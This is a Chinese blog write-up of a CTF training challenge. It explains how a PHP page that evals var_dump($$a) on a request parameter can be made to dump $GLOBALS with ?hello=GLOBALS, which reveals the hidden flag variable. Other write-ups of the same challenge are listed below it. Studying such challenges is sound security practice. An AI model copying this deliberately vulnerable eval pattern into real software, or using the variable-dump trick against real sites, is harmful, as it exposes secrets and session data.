i春秋CTF训练 Misc Web 爆破-1

最新推荐文章于 2023-12-13 15:41:38 发布
最新推荐文章于 2023-12-13 15:41:38 发布
阅读量1.1k 收藏 1
点赞数 4
分类专栏: CTF 文章标签: 正则表达式 php
来自 椰奶冻不安全 的博客,复制完可要记得我吖
本文链接:https://blog.csdn.net/qq_40654505/article/details/106865473
版权

Misc Web 爆破-1

题目内容:flag就在某六位变量中。

连接需去网站申请

访问网页得到php代码

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
  die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>

PHP $_REQUEST 用于收集 HTML 表单提交的数据。$a = @$_REQUEST['hello'];则是请求一个名为hello的参数

preg_match('/^\w*$/',$a )为匹配正则表达式函数,^匹配输入字符串的开始位置,$匹配输入字符串的结束位置,*匹配前面的子表达式零次或多次,\w匹配字母、数字、下划线

var_dump($$a);该函数用于输出变量的相关信息,显示关于一个或多个表达式的结构信息,包括表达式的类型与值,如:

<?php
$a = array(1, 2, array("a", "b", "c"));
var_dump($a);
?>

array(3) {
  [0]=>
  int(1)
  [1]=>
  int(2)
  [2]=>
  array(3) {
    [0]=>
    string(1) "a"
    [1]=>
    string(1) "b"
    [2]=>
    string(1) "c"
  }
}

var_dump($$a);这里可以构造$a=GLOBALS,得到var_dump($GLOBALS),输出$GLOBALS-全局作用域中可用的全部变量

于是在url后面直接加上?hello=GLOBALS

array(9) { ["_GET"]=> array(1) { [“hello”]=> string(7) “GLOBALS” } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(6) { [“UM_distinctid”]=> string(59) “172ccf59611550-0e1e4a42021c84-4353761-1fa400-172ccf59612928” [“Hm_lvt_2d0601bd28de7d49818249cf35d95943”]=> string(10) “1592576547” [“chkphone”]=> string(33) “acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O” [“ci_session”]=> string(40) “3a06ca2f763026e82cec13fa1ca63c2a5138f406” ["__jsluid_h"]=> string(32) “7fbb8454150c0d67c9c3039d2d39444d” [“Hm_lpvt_2d0601bd28de7d49818249cf35d95943”]=> string(10) “1592577154” } ["_FILES"]=> array(0) { } ["_REQUEST"]=> array(1) { [“hello”]=> string(7) “GLOBALS” } [“flag”]=> string(38) “flag在一个长度为6的变量里面” [“d3f0f8”]=> string(42) “flag{***}” [“a”]=> string(7) “GLOBALS” [“GLOBALS”]=> *RECURSION* }

当然也可以直接爆破得到d3f0f8,url加?hello=d3f0f8

string(42) “flag{***}”

椰奶冻不安全
关注
专栏目录
“百度杯” CTF比赛 2017 二月场 — 爆破-1(10分)
qq_34106499的博客
01-14 623
1. 文件包含的利用:include()函数; 2. $_REQUEST函数的使用; 3. 正则匹配的使用:pre_match()函数; 4. eval()函数的利用; 5. 全局变量$GLOBALS的利用;
CTF--攻防世界misc新手训练1-6
qq_40730029的博客
04-13 3900
CTF之攻防世界misc新手训练
[百度杯-二月场] (Misc-Web)爆破-1
qq_41281571的博客
07-29 593
[百度杯-二月场] (Misc-Web)爆破-1 分值:10分 类型:Misc Web已解答 题目: flag就在某六位变量中。 &lt;? php include "flag.php"; //包含flag.php $a = @$_REQUEST['hello']; //$a这个变量表示hello这个请求变量的值 if(!preg_match('/^\w*$/',$a )) // /...
“百度杯”CTF比赛 2017 二月场 爆破-1
feng的博客
09-12 212
这题只能说是我PHP没学好,怪不了出题人。 首先打开环境进行代码审计: <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 这样我们输入的hello的值就会被当成变量名,然后进行var_dump()。 这里我以为要爆破,我心想就6位,然后我真的开
百度杯”CTF比赛 2017 二月场——Web-爆破-1
Ifish的博客
05-07 1226
题目描述 解题思路 打开链接 提示说flag在变量里,看到var_dump(),$$a时,就猜测是考察超全局变量GLOBALS 所以就构造http://7d30e96f64ea46cebb0bb8321544000282aff8f4efd34bb1.game.ichunqiu.com/?hello=GLOBALS 即可得到flag:flag{fa6d5cb6-9b98-4...
i春秋-web-爆破-1
a3uRa的一个窝
08-28 1068
include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?&gt; 代码审计get传入 ?hello=GLOBALS 得到flag
i春秋 CTF misc web爆破-3
一个潜心学习的小白
10-27 2054
题目提示:这个真的是爆破。 &lt;?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-MISC关于各类编码习题(湖工商扛把子)
最新发布
03-17
在“CTF-MISC关于各类编码习题(湖工商扛把子)”这个主题中,你可以通过实践和解决1-1等文件中的题目,进一步提升自己在编码解码方面的技能。了解和熟练掌握这些编码方式对于CTF比赛中的Misc任务至关重要,能够帮助...
bugku题(本地包含和变量1)和Linux学习(四)
qq_43624349的博客
06-16 2547
本地包含 打开题目是下面的一些代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 这明显是PHP代码,然后进行分析。 这些代码涉及到的几个函数: 1.$_REQUEST: 可以获取以POS...
bugku -- eval
qq_51802152的博客
12-13 681
bugku -- eval
ctf日常学习记录(web
qq_27396789的博客
01-11 6329
爆破1题目提示:flag就在某六位变量中。点开题目链接显示代码:<?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?>关键是这个东西var_dump($$
CTF题目中遇到的PHP考点总结(一)
HBohan的博客
02-15 2072
介绍 本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。 PHP函数特性相关 一、 考点一:intval函数传入非空数组时会返回1 详情可以查一下PHP手册。【https://www.php.net/manual/zh/function.intval.php】 考点二:preg_match()只能处理字符串,当传入的是数组时将会返回false,详情也可以查一下PHP手册。 例题: incl.
php函数(三)eval函数对比详解
tutu123456789101112的博客
03-05 903
preg_match(’/^\w*$/’,$a ),对$a的值进行匹配,如果是特殊字符返回error,反之进入eval. var_dump(),结构化的打印变量值. eval(),字符串按照 PHP 代码来计算. &amp;amp;lt;?php include &amp;quot;flag.php&amp;quot;; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )) { die...
寒假WEB训练-1
DUOan0216的博客
04-06 517
因为自己寒假的时候搞了个博客 就很少在这更新了。 就把寒假的一部分放在这纪念纪念吧 本次练习的是i春秋的题目 爆破 本次的php代码为 <?php include "flag.php"; $a =@$_REQUEST['hello']; if(!preg_match('/^\w*$/'.$a)){ die('ERROR'); } eval("var_dump($$a);"); sho...
“百度杯”CTF比赛 2017 二月场 wp
qq_61768489的博客
04-04 1499
目录 爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器 爆破-1 flag在一个长度为6的变量里面 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> $$a ,.
猿人学攻防大赛题二
weixin_45886778的博客
12-14 1057
最近好久没更新文章了,其实在有空的时候就学会,目前已经学到第5题了,后续会更新出来的。 今天我们就分析一下第二题。第二题叫:js 混淆 - 动态cookie,由题目就知道到与cookie有关,并且cookie是动态的。话不多说,开始分析。 网站:http://match.yuanrenxue.com/match/2 我们看一下cookie分析一下:Cookie: Hm_lvt_0362c7a08a9a04ccf3a8463c590e1e2f=1607932654; Hm_lpvt_0362c7a08a9.
CTF挑战:WP1-ctfshow解题攻略
这篇文章主要介绍了CTF(Capture The Flag)比赛中的若干种解题技巧,特别是针对网络安全和Web安全领域的一些基本技术。CTF比赛通常涉及网络安全、逆向工程、密码学等多个领域,而这里的讨论集中在Web渗透测试上。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值